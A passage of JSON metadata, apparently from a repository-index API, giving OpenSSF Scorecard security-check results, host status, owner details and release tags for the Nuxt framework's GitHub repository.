'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32755991,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-07T02:14:30.463Z","status":"ssl_error","status_checked_at":"2026-05-07T02:14:29.405Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":64,"last_synced_at":"2026-05-03T05:32:00.401Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":118650,"followers":4625,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-05-03T05:32:00.402Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.4","sha":"20abe11fcab0461633840ad8437be23406e996f7","kind":"commit","published_at":"2026-04-29T23:46:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4/manifests"},{"name":"v4.4.4","sha":"7f8443d72d1c4bc8703d3ccf60c156d1335fda74","kind":"commit","published_at":"2026-04-29T23:45:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"e177b61526bc8f0d6849bcc20708872cd1743e4f","kind":"commit","published_at":"2026-04-29T23:34:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3/manifests"},{"name":"v3.21.3","sha":"7fbddddd19a17635d482eaa0361c811735e7baf7","kind":"commit","published_at":"2026-04-29T23:33:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3/manifests"},{"name":"v4.4.2","sha":"d042505cbd096d68117cc13a9c29cf9c3fcb999b","kind":"commit","published_at":"2026-03-12T11:58:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2/manifests"},{"name":"v4.4.1","sha":"7781701ad15238daef42a89e99f6bc33e738f40b","kind":"commit","published_at":"2026-03-12T11:43:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.1/manifests"},{"name":"v3.21.2","sha":"725f134d10cb5df8736324f6c42a9f651d203211","kind":"commit","published_at":"2026-03-12T11:26:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2/manifests"},{"name":"v4.4.0","sha":"31028d2e04cb83e4a59ef346e2769b4af13c9351","kind":"commit","published_at":"2026-03-12T08:28:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0/manifests"},{"name":"v4.3.1","sha":"7f7baf669184f626fdb1da124cf1f3986831b550","kind":"commit","published_at":"2026-02-07T16:33:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1/manifests"},{"name":"v3.21.1","sha":"5d57cf39cbcd15f7ff98d2a09f471ea1ecaa4a29","kind":"commit","published_at":"2026-02-07T16:33:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1/manifests"},{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/